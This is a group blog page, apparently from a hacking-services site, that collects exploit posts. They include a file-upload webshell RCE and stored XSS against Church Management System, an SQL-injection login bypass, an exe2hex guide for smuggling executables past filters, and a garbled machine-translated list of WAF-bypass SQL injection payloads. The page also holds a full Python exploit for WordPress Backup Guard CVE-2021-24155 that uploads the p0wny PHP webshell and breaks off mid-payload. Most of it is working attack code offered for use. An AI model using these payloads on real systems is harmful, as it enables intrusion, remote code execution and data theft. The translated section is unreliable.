Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130284

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# CVE : N/A

# Proof of Concept :

1- Login any user account and change profile picture.
2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg)
3- Before uploading your file, intercept your traffic by using any proxy.
4- Change test.php.jpg file to test.php and click forward.
5- Find your test.php file path and try any command.


###################### REQUEST ##########################################

GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/cman/members/dashboard.php
Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc

####################### RESPONSE #########################################

HTTP/1.1 200 OK
Date: Sat, 03 Jul 2021 11:28:16 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
X-Powered-By: PHP/8.0.3
Content-Length: 4410
Connection: close
Content-Type: text/html; charset=UTF-8


Host Name:                 MRT
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19043 N/A Build 19043
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Murat  
System Boot Time:          6/25/2021, 2:51:40 PM
System Manufacturer:       Dell Inc.
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.


############################################################################
HireHackking 
# Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS) 
# Date: 03 July 2021
# Exploit Author: Subhadip Nag
# Author Linkedin: www.linkedin.com/in/subhadip-nag-09/
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP

# Description #

Online Birth Certificate System 1.1 is vulnerable to stored cross site scripting (xss) in the registration form because of insufficient user supplied data.


# Proof of Concept (PoC) : Exploit #

1) Goto: http://localhost/OBCS/obcs/user/register.php
2) In the first name field, enter the payload: <script>alert(1)</script>
3) Click Register
4) Goto: http://localhost/OBCS/obcs/user/login.php
5) Enter your mobile number, password & click login
6) our XSS attack successfull

# PoC image
1) https://ibb.co/7C6g6nK
HireHackking

exe2hexbat is a Python script used to convert Windows PE executable files into batch files and vice versa.

Overview

exe2hex Encodes the executable binary file into ASCII text format. Then, transfer the results to the target computer (echoing the ASCII file is much easier than echoing the binary data). After exe2hex's output file is executed, restore the original program using or PowerShell (preinstalled on Windows by default). Files can be automatically transferred to the target computer using the built-in Telnet or WinEXE options in exe2hex. Binary EXE - ASCII Text - *Transfer* - Binary EXE 0y0zt04rqlc3850.png

Quick start

-x Use file or STDIN ( /path/to/binary-program.exe-s)-b to output to BATch/or PoSH (-b file.bat-p powershell.cmd)

Usage Example

Create BATch PowerShell file: Here I wrote an exe program casually

exe2hex -x chaos.exe lrfsfdekneh3857.png

As you can see, exe2hex converts the exe file into cmd and bat files.a3o0jkuklzh3870.pngCompress file exe2hex -x chaos.exe -b nc.txt -cc

[*] exe2hex v1.5.1

[i] Attempting to clone and compress

[i] Creating temporary file /tmp/tmp509bq1bl

[+] Compression (strip) was successful! (0.0% saved)

upx: /tmp/tmp509bq1bl: NotCompressibleException

[+] Compression (UPX) was successful! (0.0% saved)

[+] Successfully written (BATch) /root/Desktop/nc.txt vfcvpyiv3uy3882.png

Help

-h,--help #Show help information and exit

-x EXE #EXE binary file conversion

-s #Read from STDIN

-b BAT #BAT output file (DEBUG.exe method-x86)

-p POSH #PoSh output file (PowerShell method -x86/x64)

-e #URL encoding output

-r TEXT #pRefix - Text added before each line of command

-f TEXT #suFfix - Text added after each line of command

-l INT #Maximum hexadecimal value per row

-c #Clone and compress files before conversion (use -cc for higher compression)

-t # Create an Expect file to automatically perform Telnet sessions.

-w # Create an Expect file to automatically execute WinEXE sessions.

-v #Enable detailed mode

Main uses:

Convert binary programs to ASCII hexadecimal files, which can be restored using the built-in operating system program. Works on older and newer versions of Windows without pre-installing any third-party programs. Supports x86 and x64 operating systems. You can use DEBUG.exe or PowerShell to restore files. Ability to compress files before conversion. URL encodes the output. Option to add prefix and suffix text to each line. Ability to set the maximum hexadecimal length for each row. You can use binary files or pipelines in standard input (). STDIN is automatically transmitted via Telnet and/or WinEXE.

Telnet login

exe2hex.py -x chaos.exe -b chaos.bat -t 2co1rpxzmdx3908.png

At this time, a /chao-bat-telnet file will be generated for remote connection.

The format is as follows:/klogger-bat-telnet ip username password

./chao-bat-telnet 192.168.123.1 admin admin

Welcome to Microsoft Telnet Service

login: winxp

password:

*======================================================================================

Welcome to Microsoft Telnet Server.

*======================================================================================

C:\Documents and Settings\winxpcd %TEMP%

C:\DOCUME~1\winxp\LOCALS~1\Tempecho 418671.0klogger.bat

418671.0E~1\winxp\LOCALS~1\Temptype klogger.bat

C:\DOCUME~1\winxp\LOCALS~1\Temp

Postscript

exe2hex actually writes our commonly used programs or scripts into batch files such as txt cmd bat. Because some machines' WAF will restrict file upload/download exe. So a method is proposed to bypass these defense mechanisms using exe2hex. Transform it into an encoded form, and finally construct exe again and execute it.

HireHackking

SQL注入でWAFをバイパスする9つの方法

0x01はじめに

WAFは従来のファイアウォールとは異なります。WAFは特定のWebアプリケーションのコンテンツをフィルタリングできるのに対し、従来のファイアウォールはサーバー間の防御ゲートとして機能します。 HTTPトラフィックをチェックすることにより、SQLインジェクション、クロスサイトスクリプト(XSS)、ファイル包含、セキュリティ構成エラーなどのブロッキングなどのWebアプリケーションセキュリティの脆弱性から保護できます。

0x02 WAF作業原理

§例外プロトコルの検出:HTTP標準に準拠していないリクエストを拒否する

§入力検証の強化:クライアント側の検証だけでなく、プロキシとサーバー側の検証

§ホワイトリストとブラックリスト

§ルールベースと例外保護:ルールベースのメカニズムは、より黒ベースで柔軟な例外です

§国家管理:防衛セッション保護(Cookie保護、反侵入回避技術、対応監視、情報開示保護)。

0x03バイパスwaf

1。Casechangeの混合悪意のある入力トリガーWAF保護をトリガーし、WAFがケースに敏感なブラックリストを使用している場合、このフィルターをバイパスする可能性があります。

http://target.com/index.php?page_id=15ユニオン選択1,2,3,4

2。キーワードを交換します(wafで削除される特殊文字を挿入)---選択は、選択する場合があります。特殊文字が削除されると、Selectで実行されます。

http://Target.com/index.php?page_id=15nbsp; uniunionon selselectect 1,2,3,4

3。エンコードpage.php?id=1%252f%252a*/union%252f%252a

/選択

ヘキサデシマルエンコーディング:Target.com/index.php?page_id=15

/*!u%6eion*//*!se%6cect*/1,2,3,4…select(extractvalue(0x3c613e61646d696e3c2f613e、0x2f61))

:id=10%d6 '%20and%201=2%23選択

'ä'='a'; #1

4。攻撃文字列にコメントを使用します------コメントを挿入します。例えば/*! select */はWAFで無視される場合がありますが、ターゲットアプリケーションに渡されると、MySQLデータベースによって処理されます。

index.php?page_id=-15

%55NION/**/%53Elect 1,2,3,4

'Union%A0Select Pass fromユーザー#

index.php?page_id=-15

/*!Union*//*!Select*/1,2,3

?page_id=null%0a/** //*!50000%55nion*//*yoyu*/all/**/%0a/*!%53Elect*/%0a/*nnaa*/+1,2,3,4…

5。同等の機能とコマンド---キーワード検出のためにいくつかの関数またはコマンドを使用することはできませんが、多くの場合、同等または類似のコードを使用できます。

hex()、bin()==

ascii()

sleep()==benchmark()

concat_ws()==group_concat()

substr((select 'password')、1,1)

=0x70

strcmp(左( 'パスワード'、1)、

0x69)=1

strcmp(左( 'パスワード'、1)、

0x70)=0

strcmp(左( 'パスワード'、1)、

0x71)=-1

mid()、substr()

==substring()

@@ user==user()

@@ datadir==datadir()

5。特別なシンボル----特別なシンボルには、特別な意味と使用法があります

+ `symbol: select` version() `;

++-:Select+ID-1+1.ユーザーから。

+ @:Select @^1.Fromユーザー;

+mysql function()as xxx

+ `、〜、 @、%、()、[]、 - 、 +、|、%00

例:

'se'+'lec'+’t'

%s%e%l%e%c%t 1

1.aspx?id=1; exec( 'ma'+'ster.x'+'p_cm'+'dsh'+'ell

「ネットユーザー」 ')

'または - +2= - !' 2

id=1+(uni)(on)+(sel)(ect)

7。HTTPパラメーター汚染------複数のパラメーター=値を視聴およびバイパスするために値の値を提供します。 http://example.com?id=1?d='または' 1 '=' 1 ' - ' - 'in(例えば、Apache/PHPを使用する)を考えると、アプリケーションは最後の(2番目の)ID=のみを解析し、WAFは最初のID=のみを解析します。これは合理的な要求のように思えますが、アプリケーションは依然として悪意のある入力を受信して処理します。今日のほとんどのWAFは、HTTPパラメーター汚染(HPP)の影響を受けませんが、まだ試してみる価値があります。

hpp(httpパラメーター分析): /?id=1; select+1,2,3+from+users+where+id=1—

/?id=1; select+1amp; id=2,3+from+users+where+id=1—

/?id=1/**/union/*amp; id=*/select/*amp; id=*/pwd/*amp; id=*/from/*amp; id=*/usershppは繰り返しパラメーター公害としても知られています。

=3。この場合、異なるWebサーバーは次のように処理します:ozm4g4gd2cx9096.gifHPF(HTTPパラメーターセグメンテーション):この方法は、CRLFと同様のHTTPセグメンテーションインジェクションです(コントロール文字0A、%0Dなどを使用します。

/?a=1+union/*amp; b=*/select+1、pass/*amp; c=*/from+users--

a=1から *を選択します

Union/*およびb=*/select 1、pass/* limit*/fromユーザー -

HPC(HTTPパラメーター汚染):

RFC2396は次の文字を定義します。

unsurved: a-z、a-z、0-9および_。 〜 * '()

予約済み: /? @ amp;

=+ $、

賢明な: {} | \ ^ [] `

異なるWebサーバー処理プロセスには、特別なリクエストの構築時に異なるロジックがあります。マジック文字のための32kbuxpwmsl9097.gif%ASP/ASP.NETは影響を受けますpev4h2jgroh9098.gif

8。バッファオーバーフロー--- WAFは常にアプリケーションであり、他のアプリケーションと同じソフトウェアの欠陥を受けやすい。バッファオーバーフローの脆弱性が発生した場合、コードの実行を引き起こさない場合でも、WAFがクラッシュする可能性があります。WAFが適切に実行される可能性があります。

?id=1および(select 1)=(select

0xa*1000)+Union+Select+1,2、version()、4,5、database()、user()、8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

9.統合統合とは、さまざまなバイパス技術を使用することを意味します。単一のテクノロジーはフィルタリングメカニズムをバイパスできない場合がありますが、さまざまなテクノロジーを使用してそれらを混合する可能性が大きくなります。

Target.com/index.php?page_id=15+and+ (Select

1)=([0xaa]を選択します[.(約1000を追加します

'a').])+/*!union*/+/*!select*/+1,2,3,4…

id=1/*!union*/+select+1,2、concat(/*!table_name*/)+from

/* information_schema*/.tables/*!where*/+/*!table_schema*/+like+database() -

?id=-725+/*!union*/+/*!select*/+1、group_concat(column_name)、3,4,5+from+/*!Information_schem*/。columns+where+table_name=0x41646d696e------

参照リンク:https://vulnerablelife.wordpress.com/2014/12/18/web-application-firewall-bypass-techniques/

wiz_tmp_tag id='wiz-table-range-border' contentedable='false' style='display: none;'

HireHackking 
# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10

# Proof of Concept :

#Payload: <img src=x onerror=alert(1)>
#Injectable parameters : amount=  and trcode=

###################### REQUEST ##########################################

POST /cman/members/Tithes.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://localhost
Connection: close
Referer: http://localhost/cman/members/Tithes.php
Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc
Upgrade-Insecure-Requests: 1

amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=
HireHackking 
# Exploit Title: Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)
# Date: 07/03/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html
# Version: 1.0
# Tested on: Windows 10
# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication.

# Proof of Concept :

1-Go to http://target.com/cman/admin
2-Write the following payload to username and admin parameter and click login.

######################## REQUEST ###############################

POST /cman/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/cman/admin/index.php
Cookie: PHPSESSID=cne5l4cs93krjqobput7nv7sjc
Upgrade-Insecure-Requests: 1

username=test&password=%27+or+%27a%27%3D%27a&login=

################################################################

PAYLOAD:

# username : test
# password : ' or 'a'='a
HireHackking 
# Exploit Title: Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)
# Date 02.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://backup-guard.com/products/backup-wordpress
# Software Link: https://downloads.wordpress.org/plugin/backup.1.5.8.zip
# Version: Before 1.6.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24155
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24155/README.md

'''
Description:
The plugin did not ensure that the imported files are of the SGBP format and extension,
allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.
Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue:
There is a protection in place against accessing the uploaded files,
via a .htaccess in the wp-content/uploads/backup-guard/ folder, however:
    - Some web servers do not support .htaccess, e.g Nginx, making it useless in such case
    - Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid,
      and bypass the protection on web servers such as Apache

Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present,
but the file content is not verified, which could still allow chaining with an issue
such as LFI or Arbitrary File Renaming to achieve RCE
'''


'''
Banner:
'''
banner = """
  ______     _______     ____   ___ ____  _      ____  _  _   _ ____ ____  
 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \| || | / | ___| ___| 
| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | || |_| |___ \___ \ 
| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__   _| |___) |__) |
 \____|  \_/  |_____|   |_____|\___/_____|_|    |_____|  |_| |_|____/____/ 

                * Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)                                                        
                * @Hacker5preme

"""
print(banner)


'''
Import required modules:
'''
import requests
import argparse


'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}

# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()


'''
Retrieve Token for backup:
'''

token_url = "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=backup_guard_backups'

# Header (Token):
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/users.php',
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1"
}

# Get Token:
print('')
print('[+] Grabbing unique Backup Plugin Wordpress Token:')
token_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups'
init_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/index.php'
init_request = session.get(init_url).text
token_request = session.get(token_url).text
token_start_in = token_request.find('&token=')
token_start_in = token_request[token_start_in + 7:]
token = token_start_in[:token_start_in.find('"')]
print('    -> Token: ' + token)


'''
Exploit:
'''
print('')
print('[*] Starting Exploit:')
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=' + token

# Header (Exploit):
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Referer": 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups',
    "X-Requested-With": "XMLHttpRequest",
    "Content-Type": "multipart/form-data; boundary=---------------------------17366980624047956771255332862",
    "Origin": 'http://' + target_ip,
    "Connection": "close"
}

# Body (Exploit): Using p0wny shell: https://github.com/flozz/p0wny-shell
body = "-----------------------------17366980624047956771255332862\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"shell.php\"\r\nContent-Type: image/png\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n    $stdout = array();\n\n    if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n        // pass\n    } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n        chdir($cwd);\n        preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n        chdir($match[1]);\n    } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n        chdir($cwd);\n        preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n        return featureDownload($match[1]);\n    } else {\n        chdir($cwd);\n        exec($cmd, $stdout);\n    }\n\n    return array(\n        \"stdout\" => $stdout,\n        \"cwd\" => getcwd()\n    );\n}\n\nfunction featurePwd() {\n    return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n    chdir($cwd);\n    if ($type == 'cmd') {\n        $cmd = \"compgen -c $fileName\";\n    } else {\n        $cmd = \"compgen -f $fileName\";\n    }\n    $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n    $files = explode(\"\\n\", shell_exec($cmd));\n    return array(\n        'files' => $files,\n    );\n}\n\nfunction featureDownload($filePath) {\n    $file = @file_get_contents($filePath);\n    if ($file === FALSE) {\n        return array(\n            'stdout' => array('File not found / no read permission.'),\n            'cwd' => getcwd()\n        );\n    } else {\n        return array(\n            'name' => basename($filePath),\n            'file' => base64_encode($file)\n        );\n    }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n    chdir($cwd);\n    $f = @fopen($path, 'wb');\n    if ($f === FALSE) {\n        return array(\n            'stdout' => array('Invalid path / no write permission.'),\n            'cwd' => getcwd()\n        );\n    } else {\n        fwrite($f, base64_decode($file));\n        fclose($f);\n        return array(\n            'stdout' => array('Done.'),\n            'cwd' => getcwd()\n        );\n    }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n    $response = NULL;\n\n    switch ($_GET[\"feature\"]) {\n        case \"shell\":\n            $cmd = $_POST['cmd'];\n            if (!preg_match('/2>/', $cmd)) {\n                $cmd .= ' 2>&1';\n            }\n            $response = featureShell($cmd, $_POST[\"cwd\"]);\n            break;\n        case \"pwd\":\n            $response = featurePwd();\n            break;\n        case \"hint\":\n            $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n            break;\n        case 'upload':\n            $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n    }\n\n    header(\"Content-Type: application/json\");\n    echo json_encode($response);\n    die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n    <head>\n        <meta charset=\"UTF-8\" />\n        <title>p0wny@shell:~#</title>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n        <style>\n            html, body {\n                margin: 0;\n                padding: 0;\n                background: #333;\n                color: #eee;\n                font-family: monospace;\n            }\n\n            *::-webkit-scrollbar-track {\n                border-radius: 8px;\n                background-color: #353535;\n            }\n\n            *::-webkit-scrollbar {\n                width: 8px;\n                height: 8px;\n            }\n\n            *::-webkit-scrollbar-thumb {\n                border-radius: 8px;\n                -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n                background-color: #bcbcbc;\n            }\n\n            #shell {\n                background: #222;\n                max-width: 800px;\n                margin: 50px auto 0 auto;\n                box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n                font-size: 10pt;\n                display: flex;\n                flex-direction: column;\n                align-items: stretch;\n            }\n\n            #shell-content {\n                height: 500px;\n                overflow: auto;\n                padding: 5px;\n                white-space: pre-wrap;\n                flex-grow: 1;\n            }\n\n            #shell-logo {\n                font-weight: bold;\n                color: #FF4180;\n                text-align: center;\n            }\n\n            @media (max-width: 991px) {\n                #shell-logo {\n                    font-size: 6px;\n                    margin: -25px 0;\n                }\n\n                html, body, #shell {\n                    height: 100%;\n                    width: 100%;\n                    max-width: none;\n                }\n\n                #shell {\n                    margin-top: 0;\n                }\n            }\n\n            @media (max-width: 767px) {\n                #shell-input {\n                    flex-direction: column;\n                }\n            }\n\n            @media (max-width: 320px) {\n                #shell-logo {\n                    font-size: 5px;\n                }\n            }\n\n            .shell-prompt {\n                font-weight: bold;\n                color: #75DF0B;\n            }\n\n            .shell-prompt > span {\n                color: #1BC9E7;\n            }\n\n            #shell-input {\n                display: flex;\n                box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n                border-top: rgba(255, 255, 255, .05) solid 1px;\n            }\n\n            #shell-input > label {\n                flex-grow: 0;\n                display: block;\n                padding: 0 5px;\n                height: 30px;\n                line-height: 30px;\n            }\n\n            #shell-input #shell-cmd {\n                height: 30px;\n                line-height: 30px;\n                border: none;\n                background: transparent;\n                color: #eee;\n                font-family: monospace;\n                font-size: 10pt;\n                width: 100%;\n                align-self: center;\n            }\n\n            #shell-input div {\n                flex-grow: 1;\n                align-items: stretch;\n            }\n\n            #shell-input input {\n                outline: none;\n            }\n        </style>\n\n        <script>\n            var CWD = null;\n            var commandHistory = [];\n            var historyPosition = 0;\n            var eShellCmdInput = null;\n            var eShellContent = null;\n\n            function _insertCommand(command) {\n                eShellContent.innerHTML += \"\\n\\n\";\n                eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n                eShellContent.innerHTML += escapeHtml(command);\n                eShellContent.innerHTML += \"\\n\";\n                eShellContent.scrollTop = eShellContent.scrollHeight;\n            }\n\n            function _insertStdout(stdout) {\n                eShellContent.innerHTML += escapeHtml(stdout);\n                eShellContent.scrollTop = eShellContent.scrollHeight;\n            }\n\n            function _defer(callback) {\n                setTimeout(callback, 0);\n            }\n\n            function featureShell(command) {\n\n                _insertCommand(command);\n                if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n                    featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n                } else if (/^\\s*clear\\s*$/.test(command)) {\n                    // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n                    eShellContent.innerHTML = '';\n                } else {\n                    makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n                        if (response.hasOwnProperty('file')) {\n                            featureDownload(response.name, response.file)\n                        } else {\n                            _insertStdout(response.stdout.join(\"\\n\"));\n                            updateCwd(response.cwd);\n                        }\n                    });\n                }\n            }\n\n            function featureHint() {\n                if (eShellCmdInput.value.trim().length === 0) return;  // field is empty -> nothing to complete\n\n                function _requestCallback(data) {\n                    if (data.files.length <= 1) return;  // no completion\n\n                    if (data.files.length === 2) {\n                        if (type === 'cmd') {\n                            eShellCmdInput.value = data.files[0];\n                        } else {\n                            var currentValue = eShellCmdInput.value;\n                            eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n                        }\n                    } else {\n                        _insertCommand(eShellCmdInput.value);\n                        _insertStdout(data.files.join(\"\\n\"));\n                    }\n                }\n\n                var currentCmd = eShellCmdInput.value.split(\" \");\n                var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n                var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n                makeRequest(\n                    \"?feature=hint\",\n                    {\n                        filename: fileName,\n                        cwd: CWD,\n                        type: type\n                    },\n                    _requestCallback\n                );\n\n            }\n\n            function featureDownload(name, file) {\n                var element = document.createElement('a');\n                element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n                element.setAttribute('download', name);\n                element.style.display = 'none';\n                document.body.appendChild(element);\n                element.click();\n                document.body.removeChild(element);\n                _insertStdout('Done.');\n            }\n\n            function featureUpload(path) {\n                var element = document.createElement('input');\n                element.setAttribute('type', 'file');\n                element.style.display = 'none';\n                document.body.appendChild(element);\n                element.addEventListener('change', function () {\n                    var promise = getBase64(element.files[0]);\n                    promise.then(function (file) {\n                        makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n                            _insertStdout(response.stdout.join(\"\\n\"));\n                            updateCwd(response.cwd);\n                        });\n                    }, function () {\n                        _insertStdout('An unknown client-side error occurred.');\n                    });\n                });\n                element.click();\n                document.body.removeChild(element);\n            }\n\n            function getBase64(file, onLoadCallback) {\n                return new Promise(function(resolve, reject) {\n                    var reader = new FileReader();\n                    reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n                    reader.onerror = reject;\n                    reader.readAsDataURL(file);\n                });\n            }\n\n            function genPrompt(cwd) {\n                cwd = cwd || \"~\";\n                var shortCwd = cwd;\n                if (cwd.split(\"/\").length > 3) {\n                    var splittedCwd = cwd.split(\"/\");\n                    shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n                }\n                return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n            }\n\n            function updateCwd(cwd) {\n                if (cwd) {\n                    CWD = cwd;\n                    _updatePrompt();\n                    return;\n                }\n                makeRequest(\"?feature=pwd\", {}, function(response) {\n                    CWD = response.cwd;\n                    _updatePrompt();\n                });\n\n            }\n\n            function escapeHtml(string) {\n                return string\n                    .replace(/&/g, \"&\")\n                    .replace(/</g, \"<\")\n                    .replace(/>/g, \">\");\n            }\n\n            function _updatePrompt() {\n                var eShellPrompt = document.getElementById(\"shell-prompt\");\n                eShellPrompt.innerHTML = genPrompt(CWD);\n            }\n\n            function _onShellCmdKeyDown(event) {\n                switch (event.key) {\n                    case \"Enter\":\n                        featureShell(eShellCmdInput.value);\n                        insertToHistory(eShellCmdInput.value);\n                        eShellCmdInput.value = \"\";\n                        break;\n                    case \"ArrowUp\":\n                        if (historyPosition > 0) {\n                            historyPosition--;\n                            eShellCmdInput.blur();\n                            eShellCmdInput.value = commandHistory[historyPosition];\n                            _defer(function() {\n                                eShellCmdInput.focus();\n                            });\n                        }\n                        break;\n                    case \"ArrowDown\":\n                        if (historyPosition >= commandHistory.length) {\n                            break;\n                        }\n                        historyPosition++;\n                        if (historyPosition === commandHistory.length) {\n                            eShellCmdInput.value = \"\";\n                        } else {\n                            eShellCmdInput.blur();\n                            eShellCmdInput.focus();\n                            eShellCmdInput.value = commandHistory[historyPosition];\n                        }\n                        break;\n                    case 'Tab':\n                        event.preventDefault();\n                        featureHint();\n                        break;\n                }\n            }\n\n            function insertToHistory(cmd) {\n                commandHistory.push(cmd);\n                historyPosition = commandHistory.length;\n            }\n\n            function makeRequest(url, params, callback) {\n                function getQueryString() {\n                    var a 